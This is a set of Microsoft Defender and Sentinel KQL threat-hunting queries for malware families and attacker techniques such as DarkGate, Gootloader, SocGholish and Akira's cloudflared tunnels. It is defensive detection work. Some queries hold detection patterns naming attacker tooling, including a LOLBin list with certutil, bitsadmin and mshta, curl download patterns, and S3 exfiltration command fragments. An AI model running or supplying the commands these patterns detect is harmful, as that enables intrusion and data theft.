externaldata(domain:string)[h@"https://raw.githubusercontent.com/m4nbat/ioc_lists/main/clearFakeIocs.txt"] 32 | with(format="txt"); 33 | DeviceNetworkEvents 34 | | where RemoteUrl has_any (clearFakeDomains) 35 | ``` 36 | 37 | ``` 38 | //IOC: ClearFake - Possible connection to ClearFake C2 Infrastructure network connetcion to IPs 39 | let clearFakeIps = externaldata(domain:string)[h@"https://raw.githubusercontent.com/m4nbat/ioc_lists/main/clearFakeIocs.txt"] 40 | with(format="txt"); 41 | 
DeviceNetworkEvents 42 | | where RemoteIP has_any (clearFakeIps) 43 | ``` 44 | -------------------------------------------------------------------------------- /mal_clearfake_test.md: -------------------------------------------------------------------------------- 1 | 2 | DeviceEvents 3 | | where ActionType =~ "OtherAlertRelatedActivity" 4 | | sort by TimeGenerated desc 5 | 6 | DeviceEvents 7 | | where ActionType =~ "ExploitGuardAcgEnforced" 8 | | sort by TimeGenerated desc 9 | 10 | DeviceFileEvents 11 | | where FolderPath endswith @"\VFS\AppData\KSPSService.exe" and FileName =~ "KSPSService.exe" 12 | 13 | DeviceFileEvents 14 | | where FolderPath matches regex @"\\VFS\\AppData\\[a-zA-Z0-9]+.exe" and FileName endswith "exe" 15 | 16 | DeviceEvents 17 | | where ActionType contains "ServiceInstalled" 18 | | extend ServiceAccount_ = tostring(AdditionalFields.ServiceAccount) 19 | | extend ServiceName_ = tostring(AdditionalFields.ServiceName) 20 | | extend ServiceStartType_ = tostring(AdditionalFields.ServiceStartType) 21 | | extend ServiceType_ = tostring(AdditionalFields.ServiceType) 22 | | where FolderPath matches regex @"\\VFS\\AppData\\[a-zA-Z0-9]+.exe" //and ServiceName_ =~ "KSPSService.exe" 23 | -------------------------------------------------------------------------------- /mal_ttp_socgholish_suspicious_wscript_network_connetion.md: -------------------------------------------------------------------------------- 1 | # Title 2 | SOCGholish Detection Analytics 3 | 4 | # Description 5 | While JavaScript is everywhere on the web, it is rather unusual for the browser to download a JavaScript file and execute it via the Windows Script Host (wscript.exe). When this downloaded script starts communicating with devices outside of your network, things get even more suspicious. That said, this detection analytic may be noisy in some environments, so be prepared to identify what scripts are normally run in this way to tune out the noise. 
6 | 7 | # Source 8 | - https://redcanary.com/threat-detection-report/threats/socgholish/ 9 | 10 | # MITRE ATT&CK 11 | - 12 | 13 | # Queries for sentinel and MDE 14 | 15 | ``` 16 | //TTP: SOCGhoulish variants network connection from wscript.exe with a parent process that is a browser. 17 | let browsers = datatable(name:string)["chrome","edge","firefox"]; //add more 18 | DeviceNetworkEvents 19 | | where InitiatingProcessParentFileName has_any (browsers) and InitiatingProcessFileName in~ ("wscript.exe","cscript.exe") and RemoteIPType =~ "Public" 20 | ``` 21 | -------------------------------------------------------------------------------- /md_cloudflared_akira.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Interesting use of the cloudflared agent by the AKIRA ransomware Group and a quality writeup by Recon InfoSec team. A treasure trove of threat intelligence that can be used for informing defence. 4 | 5 | # Source: https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 6 | 7 | A few analytics that can be tested for hunting cloudflared usage based on the report. 
8 | 9 | ``` 10 | //use of cloudflared in intrusions by ransomware actor AKIRA 11 | // https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 12 | let possibleVictims = 13 | DeviceFileEvents 14 | | where PreviousFileName contains "cloudflared" and PreviousFileName endswith ".exe" 15 | | distinct DeviceId; 16 | let args = datatable(arg:string)[".exe","tunnel","run","--token"]; 17 | DeviceProcessEvents 18 | | where DeviceId in (possibleVictims) and InitiatingProcessCommandLine has_all (args) or ProcessCommandLine has_all (args) 19 | ``` 20 | `and` binds more tightly than `or` in KQL, so the `DeviceId in (possibleVictims)` restriction in the first query applies only to the `InitiatingProcessCommandLine` branch; wrap the two `has_all` tests in parentheses if both should be scoped to the candidate devices. Without that, the first query returns the same rows as the second one plus the device-scoped parent matches. 21 | ``` 22 | //use of cloudflared in intrusions by ransomware actor AKIRA 23 | // https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 24 | let args = datatable(arg:string)[".exe","tunnel","run","--token"]; 25 | DeviceProcessEvents 26 | | where InitiatingProcessCommandLine has_all (args) or ProcessCommandLine has_all (args) 27 | ``` 28 | 29 | ``` 30 | //use of cloudflared in intrusions by ransomware actor AKIRA 31 | // https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 32 | DeviceFileEvents 33 | | where PreviousFileName contains "cloudflared" and PreviousFileName endswith ".exe" 34 | ``` 35 | -------------------------------------------------------------------------------- /mde_SQLServerAbuse_CMD.md: -------------------------------------------------------------------------------- 1 | # SQL Server Abuse 2 | 3 | # Source 4 | https://www.microsoft.com/en-us/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/ 5 | 6 | ``` 7 | // This query detects instances of a SQL Server process launching a shell to run one or more suspicious commands. 
8 | let relevantCmdlineTokens = pack_array 9 | ("advpack.dll","appvlp.exe","atbroker.exe","bash.exe","bginfo.exe","bitsadmin.exe","cdb.exe","certutil.exe","cl_invocation.ps1","cl_mutexverifiers.ps1","cmstp.exe","Copy-Item","csi.exe","diskshadow.exe","dnscmd.exe","dnx.exe","dxcap.exe","esentutl.exe","expand.exe","extexport.exe","extrac32.exe","findstr.exe","forfiles.exe","ftp.exe","gpscript.exe","hh.exe","ie4uinit.exe","ieadvpack.dll","ieaframe.dll","ieexec.exe","infdefaultinstall.exe", "installutil.exe","Invoke-WebRequest","makecab.exe","manage-bde.wsf","mavinject.exe","mftrace.exe","microsoft.workflow.compiler.exe","mmc.exe","msbuild.exe","msconfig.exe","msdeploy.exe","msdt.exe","mshta.exe","mshtml.dll","msiexec.exe","msxsl.exe","netstat","odbcconf.exe","pcalua.exe","pcwrun.exe","pcwutl.dll","pester.bat","ping","presentationhost.exe","pubprn.vbs","rcsi.exe","regasm.exe","register-cimprovider.exe","regsvcs.exe","regsvr32.exe","replace.exe","rundll32.exe","runonce.exe","runscripthelper.exe","schtasks.exe","scriptrunner.exe","setupapi.dll","shdocvw.dll","shell32.dll","slmgr.vbs","sqltoolsps.exe","syncappvpublishingserver.exe","syncappvpublishingserver.vbs","sysinfo","syssetup.dll","systeminfo","taskkill","te.exe","tracker.exe","url.dll","verclsid.exe","vsjitdebugger.exe","wab.exe","WebClient","wget","whoami","winrm.vbs","wmic.exe","xwizard.exe","zipfldr.dll","certutil"); 10 | DeviceProcessEvents 11 | | where Timestamp >= ago(10d) 12 | | where InitiatingProcessFileName in~ ("sqlservr.exe", "sqlagent.exe", "sqlps.exe", "launchpad.exe") 13 | | summarize DistinctProcessCommandLines = tostring(makeset(ProcessCommandLine)) by DeviceId, bin(Timestamp, 2m) 14 | | where DistinctProcessCommandLines has_any(relevantCmdlineTokens) 15 | 16 | ``` 17 | -------------------------------------------------------------------------------- /mde_ZIPdomains.md: -------------------------------------------------------------------------------- 1 | # Zip Domain Hunt Query 2 | # Source: 3 | # 
Description 4 | Kusto queries to detect Zip domains 5 | 6 | ``` 7 | DeviceNetworksEvents 8 | | where RemoteUrl matches regex @"(?i)^(?:https?://)?[^/]+\.zip$" 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /mde_bunny_loader_detections_2023.md: -------------------------------------------------------------------------------- 1 | # Bunny Loader MDE Detections 2 | 3 | # Source 4 | https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service 5 | 6 | # Command and Control - Useragent and URI related IoCs 7 | ``` 8 | let UserAgents = datatable(useragent:string)["BunnyLoader","BunnyTasks"]; 9 | DeviceNetworkEvents 10 | | extend user_agent = tostring(AdditionalFields.user_agent) 11 | | extend HTTPMethod = tostring(AdditionalFields.method) 12 | | extend uri = tostring(AdditionalFields.uri) 13 | | where ActionType has_any ("HttpConnectionInspected","SslConnectionInspected") and user_agent has_any (UserAgents) and uri has_all ("Bunny") and HTTPMethod =~ "GET" 14 | | extend direction = tostring(AdditionalFields.direction) 15 | | extend host = tostring(AdditionalFields.host) 16 | | extend request_body_len = tostring(AdditionalFields.request_body_len) 17 | | extend response_body_len = tostring(AdditionalFields.response_body_len) 18 | | extend status_code = tostring(AdditionalFields.status_code) 19 | | extend status_msg = tostring(AdditionalFields.status_msg) 20 | | extend tags = tostring(parse_json(tostring(AdditionalFields.tags))) 21 | | extend trans_depth = tostring(AdditionalFields.trans_depth) 22 | | extend version_ = tostring(AdditionalFields.version) 23 | ``` 24 | # Persistence - Registry key creation 25 | ``` 26 | DeviceRegistryEvents 27 | | where ActionType =~ "RegistryValueSet" and RegistryKey =~ @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" and RegistryValueName =~ "Spyware_Blocker" 28 | ``` 29 | -------------------------------------------------------------------------------- 
/mde_commandandcontrol_.md: -------------------------------------------------------------------------------- 1 | # KQL : Hunting queries for C2 using MDE and network protection capability 2 | 3 | # Source: 4 | - https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/03-kql-MDE-WebProtection.md 5 | 6 | **Edge browser** - Microsoft SmartScreen 7 | ```kql 8 | DeviceEvents 9 | | where Timestamp > ago(7d) 10 | | where ActionType == "SmartScreenUrlWarning" 11 | | extend ParsedFields=parse_json(AdditionalFields) 12 | | summarize MDE_IoC = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) == "CustomBlockList"), 13 | MDE_WCF = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) == "CustomPolicy"), 14 | MDA_CASB = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) == "CasbPolicy"), 15 | Edge_SS = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) in ("Malicious", "Phishing")) by DeviceId, DeviceName 16 | | extend MDE_IoC_case = array_length(MDE_IoC) 17 | | extend MDE_WCF_case = array_length(MDE_WCF) 18 | | extend MDA_CASB_case = array_length(MDA_CASB) 19 | | extend Edge_SS_case = array_length(Edge_SS) 20 | | project DeviceId, DeviceName, MDE_IoC_case, MDA_CASB_case, MDE_WCF_case, Edge_SS_case, MDE_IoC, MDE_WCF, MDA_CASB, Edge_SS 21 | ``` 22 | 23 | **3rd party browser** - Windows Defender Exploit Guard, Network Protection 24 | ```kql 25 | DeviceEvents 26 | | where Timestamp > ago(7d) 27 | | where ActionType == "ExploitGuardNetworkProtectionBlocked" 28 | | extend ParsedFields=parse_json(AdditionalFields) 29 | | summarize MDE_IoC = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CustomBlockList"), 30 | MDE_WCF = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CustomPolicy"), 31 | MDE_NP = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CmdCtrl"), 32 | MDA_CASB = make_list_if(RemoteUrl, 
ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CasbPolicy") by DeviceId, DeviceName 33 | | extend MDE_IoC_case = array_length(MDE_IoC) 34 | | extend MDE_WCF_case = array_length(MDE_WCF) 35 | | extend MDE_NP_case = array_length(MDE_NP) 36 | | extend MDA_CASB_case = array_length(MDA_CASB) 37 | | project DeviceId, DeviceName, MDE_IoC_case, MDE_NP_case, MDE_WCF_case, MDA_CASB_case, MDE_IoC, MDE_NP, MDE_WCF, MDA_CASB 38 | ``` 39 | 40 | **Bypass** - MDE Indicators Warn & MDA Monitored app 41 | ```kql 42 | DeviceEvents 43 | | where Timestamp > ago(7d) 44 | | where ActionType in ("SmartScreenUserOverride", "NetworkProtectionUserBypassEvent") 45 | | extend Browser = case( 46 | InitiatingProcessFileName has "msedge", "Edge", 47 | InitiatingProcessFileName has "chrome", "Chrome", 48 | InitiatingProcessFileName has "firefox", "Firefox", 49 | InitiatingProcessFileName has "opera", "Opera", 50 | "3rd party browser") 51 | | project Timestamp, DeviceId, DeviceName, ActionType, Browser, RemoteUrl 52 | ``` 53 | -------------------------------------------------------------------------------- /mde_darkgate_autoitScript.md: -------------------------------------------------------------------------------- 1 | # Title 2 | DarkGate AutoIt script command-line detection 3 | 4 | # Source 5 | Intrusion analysis 6 | 7 | # Description 8 | 9 | ``` 10 | DeviceProcessEvents | where FileName =~ "cmd.exe" | where ProcessCommandLine has_all ("curl","http",".au3") 11 | 12 | ``` 13 | -------------------------------------------------------------------------------- /mde_darkgate_detections.md: -------------------------------------------------------------------------------- 1 | # DarkGate MDE Detections 2 | 3 | # Source (Intrusion Analysis) 4 | 5 | # Port and HTTP request based detection 6 | 7 | ``` 8 | DeviceNetworkEvents 9 | | where TimeGenerated > ago(60d) 10 | | extend HTTPMethod = tostring(AdditionalFields.method) 11 | | where ActionType =~ "HttpConnectionInspected" and RemotePort == 2351 
and HTTPMethod =~ "POST" 12 | | extend direction = tostring(AdditionalFields.direction) 13 | | extend host = tostring(AdditionalFields.host) 14 | | extend request_body_len = tostring(AdditionalFields.request_body_len) 15 | | extend response_body_len = tostring(AdditionalFields.response_body_len) 16 | | extend status_code = tostring(AdditionalFields.status_code) 17 | | extend status_msg = tostring(AdditionalFields.status_msg) 18 | | extend tags = tostring(parse_json(tostring(AdditionalFields.tags))) 19 | | extend trans_depth = tostring(AdditionalFields.trans_depth) 20 | | extend uri = tostring(AdditionalFields.uri) 21 | | extend user_agent = tostring(AdditionalFields.user_agent) 22 | | extend version_ = tostring(AdditionalFields.version) 23 | ``` 24 | -------------------------------------------------------------------------------- /mde_darkgate_sharepoint_ceo_link.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Darkgate 3 | 4 | # Source 5 | Intrusion Analysis 6 | 7 | # Description 8 | 9 | 10 | ``` 11 | UrlClickEvents 12 | | where Workload =~ "Teams" 13 | | where Url matches regex @"https:\/\/[a-zA-Z0-9-_]+\.sharepoint\.com\/:[a-zA-Z]:\/g\/personal\/[a-zA-Z0-9_]+_onmicrosoft_com" 14 | 15 | ``` 16 | 17 | ``` 18 | DeviceNetworkEvents 19 | | where RemoteUrl has_all ("ceo",".sharepoint.com","_onmicrosoft_com") 20 | 21 | ``` 22 | 23 | ``` 24 | UrlClickEvents 25 | | where Url has_all ("ceo",".sharepoint.com","_onmicrosoft_com") 26 | ``` 27 | 28 | ``` 29 | DeviceNetworkEvents 30 | | where RemoteUrl matches regex @"https:\/\/[a-zA-Z0-9-_]+\.sharepoint\.com\/:[a-zA-Z]:\/g\/personal\/[a-zA-Z0-9_]+_onmicrosoft_com" 31 | 32 | ``` 33 | -------------------------------------------------------------------------------- /mde_darkgate_vbs_download.md: -------------------------------------------------------------------------------- 1 | # DarkGate VBS File Download 2 | 3 | # Source 4 | Intrusion Analysis 5 | 6 | # MDE 7 | ``` 8 | 
DeviceNetworkEvents 9 | | where InitiatingProcessCommandLine has_all (".vbs") and RemotePort == 2351 and InitiatingProcessFileName =~ "wscript.exe" 10 | ``` 11 | -------------------------------------------------------------------------------- /mde_exfiltration_to_S3.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Data exfiltration to AWS S3 via the command line 3 | 4 | # Source 5 | DFIR Report - 6 | 7 | # Description 8 | 9 | ``` 10 | DeviceProcessEvents 11 | | where InitiatingProcessFileName endswith "WaAppAgent.exe" and InitiatingProcessCommandLine has_all (" s3 "," cp ","--exclude",".dll",".exe") 12 | 13 | ``` 14 | -------------------------------------------------------------------------------- /mde_exploitguard_events.md: -------------------------------------------------------------------------------- 1 | # ExploitGuard IoCs Query 2 | 3 | # Source 4 | 5 | - Twitter Elli Shlomo: https://twitter.com/ellishlomo/status/1655828023482908673 6 | 7 | ``` 8 | //exploit guard IoCs across Defender products 9 | DeviceEvents 10 | | where ActionType =~ "ExploitGuardNetworkProtectionBlocked" 11 | | extend AdditionalInfo = parse_json(AdditionalFields) 12 | | summarize MDE = countif(ResponseCategory=tostring(AdditionalInfo.ResponseCategory) =="CustomBlockList"), //url indicators 13 | MDE_WCF = countif(ResponseCategory=tostring(AdditionalInfo.ResponseCategory) =="CustomPolicy"), //url indicators 14 | MDA = countif(ResponseCategory=tostring(AdditionalInfo.ResponseCategory) =="CasbPolicy") //url indicators 15 | by DeviceName, RemoteUrl, InitiatingProcessAccountUpn, InitiatingProcessAccountDomain 16 | ``` 17 | -------------------------------------------------------------------------------- /mde_file_downloads.md: -------------------------------------------------------------------------------- 1 | # File Downloads 2 | 3 | ## mde kql query 4 | ``` 5 | // Detect file downloads 6 | DeviceNetworkEvents 7 | | where ActionType == 
'HttpConnectionInspected' 8 | | extend json = todynamic(AdditionalFields) 9 | | extend direction= tostring(json.direction), user_agent=tostring(json.user_agent), uri=tostring(json.uri) 10 | | where uri matches regex @"\.(?:dll|exe|zip|7z|ps1|ps|bat|sh)$" 11 | ``` 12 | -------------------------------------------------------------------------------- /mde_headlessBrowserChromium.md: -------------------------------------------------------------------------------- 1 | # Chromium Based Headless browser download 2 | 3 | # Description 4 | This detection analytic looks for Chromium-based browsers opening with the headless parameter and subsequently downloading files from a remote location. While developers may use headless browsers to download files, it is an unusual way to do so. This analytic can help identify Ducktail as well as other suspicious activity. 5 | 6 | # Source 7 | https://redcanary.com/blog/intelligence-insights-june-2023/ 8 | 9 | # Analytics 10 | 11 | ## MDE 12 | 13 | Analytic to identify Chromium-based headless browsers being used to download files. Can identify the Ducktail infostealer and other unusual activity. 14 | 15 | ``` 16 | // Chromium-based headless browsers being used to download files. Can identify Ducktail infostealer and other unusual activity. 
17 | // https://redcanary.com/blog/intelligence-insights-june-2023/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2023-06-23T09:00:07.795-06:00&mkt_tok=MDAzLVlSVS0zMTQAAAGMh8L-8o-_Q9SP1hoJeNiD2eROhNCDfE-o9-mzCwm2WWNKCJBsCemaZGtIk0Z6CPB6HvtJ3Tw56zP18g_5eysElp6SPgKrW6DFYNQtuLYKRZY 18 | let args = datatable(name:string)["--headless","--dump-dom","http"]; 19 | let chromiumBrowsers = datatable(name:string)["chrome.exe","msedge.exe"]; //add others 20 | DeviceProcessEvents 21 | | where (InitiatingProcessFileName has_any (chromiumBrowsers) or FileName has_any (chromiumBrowsers)) and (InitiatingProcessCommandLine has_all (args) or ProcessCommandLine has_all (args)) 22 | ``` 23 | -------------------------------------------------------------------------------- /mde_initiaaccess_qr_code.md: -------------------------------------------------------------------------------- 1 | # QR Phishing Identification 2 | 3 | # Sources: 4 | https://rodtrent.substack.com/p/microsoft-sentinel-soc-101-how-to-b94 5 | 6 | ``` 7 | let image_extensions = dynamic(["jpg", "jpeg", "png", "bmp", "gif"]); 8 | EmailAttachmentInfo 9 | | where FileType in (image_extensions) 10 | | where FileName matches regex "[A-Z0-9]{9,10}.[A-Za-z0-9]+$" 11 | | join EmailUrlInfo on TenantId 12 | | where UrlLocation == "Attachment" 13 | | distinct FileName, FileType, SenderFromAddress, RecipientEmailAddress, UrlDomain, Url 14 | ``` 15 | 16 | ``` 17 | EmailEvents 18 | | where AttachmentCount == 2 19 | | join EmailAttachmentInfo on NetworkMessageId 20 | | where FileName matches regex @"[A-Z]{9,10}\.(png|jpeg|jpg|bmp|gif)" 21 | | where EmailDirection == 'Inbound' 22 | ``` 23 | -------------------------------------------------------------------------------- /mde_mal_munchkin_raas.md: -------------------------------------------------------------------------------- 1 | # Name 2 | Munchkin Tool 3 | 4 | # Description 5 | The Munchkin utility is delivered as an ISO file, which is loaded in a newly installed 
instance of the VirtualBox virtualization product. This ISO file represents a customized implementation of the Alpine OS, which threat operators likely chose due to its small footprint. Upon running the operating system, the following commands are executed at boot: 6 | 7 | # Source: 8 | https://unit42.paloaltonetworks.com/blackcat-ransomware-releases-new-utility-munchkin/ 9 | 10 | 11 | # Detection 12 | 13 | ``` 14 | let commands = datatable(command:string)["new-session","-A","-s","controller","send","-t","controller","/app/controller","&&","poweroff","ENTER","detach","-s","controller"]; 15 | DeviceProcessEvents 16 | | where ProcessCommandLine has_all (commands) or InitiatingProcessCommandLine has_all (commands) 17 | ``` 18 | 19 | ``` 20 | let c1 = datatable(a:string)["new-session","-A","-s","controller","send","-t","controller","/app/controller","&&","poweroff","ENTER","detach","-s","controller"]; 21 | let c2 = datatable(b:string)["echo","-n","password","|","chpasswd"]; 22 | let c3 = datatable(c:string)["eject"]; 23 | let command1 = DeviceProcessEvents | where ProcessCommandLine has_all (c1) | distinct DeviceId, ProcessCommandLine; 24 | let command2 = DeviceProcessEvents | where ProcessCommandLine has_all (c2) | distinct DeviceId, ProcessCommandLine; 25 | let command3 = DeviceProcessEvents | where ProcessCommandLine has_all (c3) | distinct DeviceId, ProcessCommandLine; 26 | command1 | join command2 on DeviceId | join command3 on DeviceId 27 | | where isnotempty(DeviceId) and isnotempty(DeviceId1) and isnotempty(DeviceId2) 28 | ``` 29 | -------------------------------------------------------------------------------- /mde_persistence_registry_winlogon_t1547.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Winlogon Registry Key Persistence 3 | 4 | # Tactics: 5 | - Persistence 6 | - T1547: Boot or Logon Autostart Execution 7 | - T1547.001: Registry Run Keys / Startup Folder 8 | 9 | # Source 10 | - 
https://www.hackingarticles.in/windows-persistence-using-winlogon/ 11 | 12 | # Description 13 | Find Winlogon with outbound connections #MDE 14 | 15 | Kusto: 16 | 17 | ``` 18 | DeviceRegistryEvents 19 | | where ActionType in~ ("RegistryValueSet","RegistryValueCreated") 20 | | where ( RegistryKey has @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" or RegistryKey has @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ) and RegistryValueName in~ ("shell","userinit") 21 | // review the key and associated key value to understand if malicious activity has taken place e.g. C:\Windows\system32\userinit.exe, C:\Windows\System32\evil.exe 22 | 23 | ``` 24 | -------------------------------------------------------------------------------- /mde_rmm_tools.md: -------------------------------------------------------------------------------- 1 | # Title 2 | RMM Tool Hunt Queries 3 | 4 | # Description 5 | Analytics to hunt for RMM tool usage in the environment 6 | 7 | # MITRE ATT&CK 8 | TA0011: Command and Control 9 | T1219: Remote Access Software 10 | T1133: External Remote Services 11 | 12 | # MDE Queries 13 | 14 | ## Splashtop 15 | ``` 16 | DeviceProcessEvents 17 | | where (ProcessVersionInfoProductName contains "SplashTop" and ProcessVersionInfoFileDescription contains "SplashTop") or (ProcessVersionInfoOriginalFileName contains "SplashTop") 18 | 19 | ``` 20 | -------------------------------------------------------------------------------- /mde_script_execution_from_explorer_ZIP_function.md: -------------------------------------------------------------------------------- 1 | # Red Canary Intelligence Insights: September 2023 2 | 3 | **Source:** https://redcanary.com/blog/intelligence-insights-september-2023/ 4 | 5 | **Experimental hunting queries based on Red Canary threat report (Untested)** 6 | 7 | **MDE and Sentinel** 8 | 9 | ``` 10 | //The following detection analytic identifies scripts executed from the built-in explorer.exe ZIP folder function. 
Adversaries like Scarlet Goldfinch often compress malicious scripts via a ZIP file in an attempt to evade network-based security products. Investigating follow-on file modifications, registry modifications, and child processes related to this behavior can help determine if it is malicious or legitimate. 11 | DeviceNetworkEvents 12 | | where InitiatingProcessFileName =~ "wscript.exe" and ( InitiatingProcessCommandLine has_any ("users","temp") and InitiatingProcessCommandLine has_any (".zip",".js") ) 13 | ``` 14 | 15 | ``` 16 | //The following detection analytic identifies scripts executed from the built-in explorer.exe ZIP folder function. Adversaries like Scarlet Goldfinch often compress malicious scripts via a ZIP file in an attempt to evade network-based security products. Investigating follow-on file modifications, registry modifications, and child processes related to this behavior can help determine if it is malicious or legitimate. 17 | DeviceProcessEvents 18 | | where InitiatingProcessParentFileName =~ "explorer.exe" and InitiatingProcessFileName =~ "wscript.exe" and ( InitiatingProcessCommandLine has_any ("users","temp") and InitiatingProcessCommandLine has_any (".zip",".js") ) 19 | ``` 20 | -------------------------------------------------------------------------------- /mde_smartscreen_events.md: -------------------------------------------------------------------------------- 1 | # MDE Smartscreen Events 2 | 3 | Source: https://twitter.com/ellishlomo/status/1655097765565722629 4 | 5 | ``` 6 | let SmartScreenActions = dynamic([ 7 | "SmartScreenAppWarning", 8 | "SmartScreenExploitWarning", 9 | "SmartScreenUrlWarning", 10 | "SmartScreenUserOverride" 11 | ]); 12 | DeviceEvents 13 | | where ActionType has_any (SmartScreenActions) 14 | ``` 15 | -------------------------------------------------------------------------------- /mde_smb_filecopy.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Lateral movement 
copying files to the DC 3 | 4 | # Source 5 | @eschlomo 6 | 7 | # MITRE ATT&CK 8 | - TA0033 - Lateral Movement 9 | - T1570 - Lateral Tool Transfer 10 | - T1021.002 - SMB/Windows Admin Shares 11 | - T1210 - Exploitation of Remote Services 12 | - T1021 - Remote Services 13 | 14 | 15 | MDE queries 16 | ``` 17 | IdentityDirectoryEvents 18 | | where Timestamp >= ago(1h) 19 | | where ActionType == "SMB file copy" 20 | | extend ParsedFields=parse_json(AdditionalFields) 21 | | extend FileName=tostring(ParsedFields.FileName) 22 | | extend FilePath=tostring(ParsedFields.FilePath) 23 | | extend ActionMethod=tostring(ParsedFields.Method) 24 | | where ActionMethod == "Write" 25 | | summarize Count = count() by Timestamp, ActionType, ActionMethod, AccountDisplayName, DeviceName, DestinationDeviceName, FileName, FilePath 26 | ``` 27 | -------------------------------------------------------------------------------- /mde_stealer.md: -------------------------------------------------------------------------------- 1 | # Heading 2 | -------------------------------------------------------------------------------- /mde_various_loldrivers.md: -------------------------------------------------------------------------------- 1 | # LOLDRIVERS Threat Hunting 2 | 3 | # Source: 4 | 5 | - WWW.LOLDRIVERS.IO 6 | 7 | # KQL Hunt Query 8 | 9 | ``` 10 | let loldrivers = externaldata(Id:string, Author:string, Created:datetime, MitreID:string, Category:string, Verified:bool, Commands:dynamic, Resources:dynamic, Acknowledgement:dynamic, Detection:dynamic, KnownVulnerableSamples:dynamic, Tags:dynamic) 11 | [h@'https://www.loldrivers.io/api/drivers.json'] 12 | with(format='multijson') 13 | | mv-expand KnownVulnerableSamples 14 | | extend SHA256_ = tostring(KnownVulnerableSamples.SHA256) 15 | | extend SHA1_ = tostring(KnownVulnerableSamples.SHA1) 16 | | extend MD5_ = tostring(KnownVulnerableSamples.MD5) 17 | ; 18 | DeviceFileEvents 19 | | where SHA1 in~ (loldrivers) or MD5 in~ (loldrivers) or SHA256 in~ 
(loldrivers) 20 | ``` 21 | -------------------------------------------------------------------------------- /med_tampering_event.md: -------------------------------------------------------------------------------- 1 | # MDE Tampering Event 2 | 3 | # Source: https://twitter.com/ellishlomo/status/1653622838949969925 4 | 5 | ``` 6 | DeviceEvents 7 | | where ActionType == "TamperingAttempt" 8 | | extend AdditionalInfo = parse_json(AdditionalFields) 9 | | extend Status = AdditionalInfo.['Status'] 10 | | extend Target = AdditionalInfo.['Target'] 11 | ``` 12 | -------------------------------------------------------------------------------- /nf_mal-ttp_t1059_007_gootloader.md: -------------------------------------------------------------------------------- 1 | # Windows Script Host (wscript.exe) Executing Content from a User's AppData Folder 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1059.007 | Command and Scripting Interpreter: JavaScript | [Command and Scripting Interpreter: JavaScript](https://attack.mitre.org/techniques/T1059/007/) | 10 | 11 | #### Description 12 | This detection rule identifies instances where the Windows Script Host (`wscript.exe`) is executing a JavaScript (`.js`) file from the user's `AppData` folder. It aims to detect instances where a user may have unintentionally executed malicious content by opening a file associated with Gootloader. 13 | 14 | #### Risk 15 | This detection helps identify potential execution of malicious scripts from a user’s `AppData` folder, a common tactic for malware such as Gootloader. This behavior is a common sign of an initial compromise, often leading to further infection or data exfiltration. 
16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | 23 | #### References 24 | - https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf 25 | - https://kqlquery.com/ 26 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | DeviceProcessEvents 31 | | where FileName =~ "wscript.exe" 32 | | where ProcessCommandLine has @"\appdata\" and ProcessCommandLine endswith ".js" 33 | -------------------------------------------------------------------------------- /nf_mal-ttp_t1218.011_gootloader.md: -------------------------------------------------------------------------------- 1 | # Rundll32 (rundll32.exe) with No Command-Line Arguments 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1218.011 | Signed Binary Proxy Execution: Rundll32 | [Signed Binary Proxy Execution: Rundll32](https://attack.mitre.org/techniques/T1218/011/) | 10 | 11 | #### Description 12 | This detection rule identifies instances of `rundll32.exe` executing with no command-line arguments. This behavior is often indicative of malicious activity, such as injection by Cobalt Strike beacons, and has been observed in Gootloader infections. 13 | 14 | #### Risk 15 | Rundll32 executing without command-line arguments is uncommon in legitimate operations and often signifies injection techniques leveraged by malware, particularly Gootloader and Cobalt Strike. 
